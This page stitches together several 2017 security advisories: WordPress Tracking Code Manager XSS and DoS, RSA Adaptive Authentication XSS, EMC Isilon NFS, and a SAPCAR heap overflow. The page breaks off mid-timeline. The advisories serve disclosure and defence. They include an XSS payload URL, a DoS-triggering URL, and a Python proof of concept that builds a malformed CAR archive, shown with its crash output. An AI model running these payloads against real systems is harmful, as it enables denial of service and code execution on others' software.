DefenseCode ThunderScan SAST Advisory: WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities Advisory ID: DC-2017-01-020 Advisory Title: WordPress Tracking Code Manager Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories/DC-2017-01-020_WordPress_Tracking_Code_Manager_Plugin_Advisory.pdf Software: WordPress Tracking Code Manager Software Language: PHP Version: 1.11.1 and below Vendor Status: Vendor contacted Release Date: 2017-05-10 Risk: Medium 1. General Overview === During the security audit of Tracking Code Manager plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the developers, Tracking Code Manager is a plugin to manage all your tracking code and conversion pixels, simply. Compatible with Facebook Ads, Google Adwords, WooCommerce, Easy Digital Downloads, WP eCommerce. It has more than 40,000 downloads on wordpress.org. Homepage: https://wordpress.org/plugins/tracking-code-manager/ 3. Brief Vulnerability Description == During the security analysis, ThunderScan discovered Cross-Site Scripting and remote Denial of Service vulnerabilities in Tracking Code Manager plugin. Denial of Service requires only one visit to a specific URL and whole WordPress becomes completely unresponsive until restart. DoS is based upon the ability of the user to select and call a function of it's choice (while safisfying specific conditions). By making a recursive call to the function that handles the request (tcmp_do_action()) DoS can easily be accomplished. Both vulnerabilities can be found in the settings section of the plugin, and can be remotely triggered due to missing nonce token and validation. Since the DoS vulnerability relies on GET requests, is missing the nonce token, the vulnerability is also directly exposed to attack vectors such as Cross Site request forgery (CSRF). DoS vulnerability was confirmed on windows OS. 3.1 Cross-Site Scripting URL Parameter:tcmp_action Vulnerable URL: http://vulnerablesite.com/wp-admin/options-general.php?page=tracking-code-manager=editor_action=alert(1) 3.2. Denial of Service Function:tcmp_do_action() Vulnerable URL: http://vulnerablesite.com/wp-admin/options-general.php?page=tracking-code-manager=editor_action=do_action 4. Solution === Vendor should resolve the security issues in next release. All users are strongly advised to update WordPress Tracking Code Manager plugin to the latest available version as soon as the vendor releases an update. 5. Credits == Discovered with DefenseCode ThunderScan Source Code Security Analyzer by Neven Biruski 6. Disclosure Timeline == 04/04/2017Vendor contacted 07/04/2017Vendor responded: "We will fix it in the next update" 10/05/2017Advisory released to the public 7. About DefenseCode DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com/ Twitter: https://twitter.com/DefenseCode/
ESA-2017-017: RSA® Adaptive Authentication (On-Premise) Cross-Site Scripting Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 EMC Identifier: ESA-2017-017: RSA® Adaptive Authentication (On-Premise) Cross-Site Scripting Vulnerability CVE Identifier: CVE-2017-4978 Severity Rating: CVSS v3 Score: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) Affected Products: RSA Adaptive Authentication (On-Premise) versions prior to 7.3 P2 (exclusive) Summary: RSA Adaptive Authentication (On-Premise) contains a fix for a cross-site scripting vulnerability that could potentially be exploited by malicious users to compromise the affected system. Details: RSA Adaptive Authentication (On-Premise) is affected by a cross-site scripting vulnerability. Attackers could potentially exploit this vulnerability to execute arbitrary HTML or JavaScript code in the users browser session in the context of the affected application. Recommendation: The following RSA Adaptive Authentication (On-Premise) release contains resolution to this vulnerability: RSA Adaptive Authentication (On-Premise) version 7.3 P2 and later RSA recommends all customers upgrade at the earliest opportunity. For additional documentation, downloads, and more, visit the RSA Adaptive Authentication page on RSA Link. Severity Rating: For an explanation of Severity Ratings, refer to the Security Advisories Severity Rating knowledge base article. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the Product Version Life Cycle for additional details. RSA Link Security Advisories: Read and use the information in this RSA Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact RSA Software Technical Support at 1-800-995-5095. RSA Security LLC and its affiliates, including without limitation, its ultimate parent company, Dell Technologies, distribute RSA Security Advisories in order to bring to the attention of users of the affected RSA products, important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA, its affiliates or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA, its affiliates or its suppliers have been advised of the possibility of such damages. Some jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQEcBAEBCAAGBQJZE2ePAAoJEHbcu+fsE81ZgXEH/jaPzqW6KA4KpWRuLT5FEwLk lLP2c/AEEHkYa5uhyPJuA/AcLAArtcGcnFIB8rPqMnKJ0Y5efWsShmj+1zXpTw4L bLE3B3M5BG6pf2hnPbQvQxwDo1shdKj8CwkP/2T5BArOcw9Xy+ua7Q5z056TePDB 9uiwnzC1q2zaA2v1bBFtwM2xDpW1LT0/YqM/6vA9w2dua5IrsqoGZC4FMGoXem/H 3rs5nvBkc/4Gr+smy3lIdpxn1szwQHHka1HWgeTCpDthVUxc7aHjGUecAOzYF9JW n0B1/Tlrkn5FnkjgXYl1ZmUIW1UU2oe65tXnMtG0L1XQPC1V38ihjPnoaQ3prg0= =iC5y -END PGP SIGNATURE-
ESA-2017-027: EMC Isilon OneFS NFS Export Upgrade Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 ESA-2017-027: EMC Isilon OneFS NFS Export Upgrade Vulnerability EMC Identifier: ESA-2017-027 CVE Identifier: CVE-2017-4979 Severity Rating: CVSS v3 Base Score: 7.1 (AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H) Affected products: The issue occurs in the following versions after an upgrade from OneFS 7.1.1.x or earlier: OneFS 8.0.1.0 OneFS 8.0.0.0 - 8.0.0.2 OneFS 7.2.1.0 - 7.2.1.3 OneFS 7.2.0.x Summary: EMC Isilon OneFS is affected by an NFS export vulnerability. Under certain conditions, after upgrading a cluster from OneFS 7.1.1.x or earlier, users may have unexpected levels of access to some NFS exports. Details: EMC Isilon OneFS is affected by the OneFS NFS Export Upgrade Vulnerability. Changing the default export permissions, after having created exports and then upgrading OneFS, can result in giving access to users that shouldnt have it, or in prohibiting access to those that should have access. Resolution: The following versions of EMC Isilon OneFS resolve this vulnerability: EMC Isilon OneFS 8.0.1.1 EMC Isilon OneFS 8.0.0.3 EMC Isilon OneFS 7.2.1.4 If you cannot upgrade at this time, please see article 487758 for instructions to perform a workaround. Remediation: If the issue has already occurred, you must manually fix each export file for which the settings were incorrectly overridden. If you need assistance, contact Isilon Technical Support. Link to remedies: Registered EMC Online Support customers can download OneFS installation files from the Downloads for Isilon OneFS page of the EMC Online Support site at https://support.emc.com/downloads/15209_Isilon-OneFS. If you have any questions, please contact EMC Support. [The following is standard text included in all security advisories. Please do not change or delete.] Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQEcBAEBCAAGBQJZE2g4AAoJEHbcu+fsE81ZrkoH/Rz+mkQ7OpvylGZUMXvyxFbx gLXPRXqwfNJfRfrJ4Ean6QSQ1exJcXHXkJUq8xHZ81DRuLcJAnY0++vNoVGJlsjW 99Hp+LcePTTTIfgYk12qFmWG2ipHuTbMze36f7BDODD4v1zmgub0ssbBy13gmOaK gjRkGqEavwNgIvR3whckvtF55JQ6qaaJquwAoK3bgbwU7oEsKxl2Y+vlBnVzPzFX YlYZIIWBtNL6jLMHgY6OA/++scpUJmfVo320CqjHd2qTpACrFZj0QuCBk3rIs4SU tbP5we+Hblqn3vFavLxMMe3ccCwsF3XB7kFf1ZYioH7hnJuU1WYA6u2jmyjctYs= =t6zx -END PGP SIGNATURE-
[CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability
1. *Advisory Information*
Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability
Advisory ID: CORE-2017-0001
Advisory URL: http://www.coresecurity.com/advisories/sap-sapcar-
heap-based-buffer-overflow-vulnerability
Date published: 2017-05-10
Date of last update: 2017-05-10
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Heap-based Buffer Overflow [CWE-122]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2017-8852
3. *Vulnerability Description*
SAP [1] distributes software and packages using an archive program
called SAPCAR [2].
This program uses a custom archive file format. A memory corruption
vulnerability was found in the parsing of specially crafted archive
files, that could lead to local code execution scenarios.
4. *Vulnerable Packages*
SAPCAR archive tool version 721.510
Other products and versions might be affected, but they were not tested.
5. *Vendor Information, Solutions and Workarounds*
SAP published the following Security Notes:
. 2441560
6. *Credits*
This vulnerability was discovered and researched by Martin Gallo and
Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from
Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
This vulnerability is caused by a controlled heap buffer overflow when
opening a specially crafted CAR archive file.
The following python code can be used to generate an archive file that
triggers the vulnerability:
/-
#!/usr/bin/env python
from scapy.packet import Raw
from pysap.SAPCAR import *
# We write a file just to have some data to put into the archive
with open("string.txt", "w") as fd:
fd.write("Some string to compress")
# Create a new SAP CAR Archive
f = SAPCARArchive("poc.car", mode="wb", version=SAPCAR_VERSION_200)
# Add the text file
f.add_file("string.txt")
# Replace the blocks in the compressed file with the faulty blocks
f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*30 + "\x00\xff"))
f._sapcar.files0[0].blocks.append(Raw("A" * 0x))
# Write the file
f.write()
$ ./SAPCAR -tvf poc.car
SAPCAR: processing archive poc.car (version 2.00)
-rw-rw-r-- 2309 Feb 2017 18:12 string.txt
Segmentation fault (core dumped)
-/
The CAR archive files in its version 2.00 are comprised of an archive
header and a list of archived files [3]. Each archived file has a
header containing the file's metadata, and the content of the file is
split among several blocks.
When the SAPCAR program opens a file containing an archived file block
different than the known ones [4], it reads an additional 32 bytes of
file metadata. The program then uses the last two bytes of the data
read as a size field, and copies that amount of data into a fixed-
length buffer previously allocated in the heap. As the length field is
not properly validated, the operation results in a heap-based buffer
overflow.
It's worth mentioning that signature validation doesn't prevent the
vulnerability to be triggered, as the signature file needs to be
extracted from the archive file in order for the validation to be
performed.
8. *Report Timeline*
2017-02-15: Core Security sent an initial notification to SAP.
2017-02-16: SAP confirmed the reception of the email and requested the
draft version of the advisory.
2017-02-16: Core Security sent SAP a draft version of the advisory and
informed them we would adjust our publication schedule according with
the release of a solution to the issues.
2017-02-17: SAP confirmed reception of the draft advisory and assigned
the incident ticket 1780137949 for tracking this issue. They will
answer back once the team analyze the report.
2017-03-06: Core Security asked SAP for news about the advisory and
publication date.
2017-03-08: SAP answered back saying they had troubles generating the
SAPCAR archive. They asked for a pre-built one.
2017-03-08: Core Security researcher sent a PoC SAPCAR archive that can
trigger the vulnerability. SAP confirmed reception.
2017-03-08: SAP asked for GPG key for one of the researchers involved
in the discovery. Core Security sent (again) the key. SAP confirmed
reception.
2017-03-13: SAP confirmed they could reproduce the vulnerability. They
said they cannot commit to a publication date yet, but they aim at May
9th, although it could fall in April Patch day or postpone after May.
2017-03-13: Core Security thanked SAP for the tentative date and
informed them we would publish our security advisory accordingly upon
their confirmation.
2017-04-03: Core Security asked SAP for an update about the final
publication date for this vulnerability's patch.
2017-04-05: SAP confirmed they will be able to release the fix in May,
although there could be chances to release it in April. They will
confirm as soon as possible.
2017-04-05: Core Security thanked SAP for the update and asked for a
security note number and CVE (if
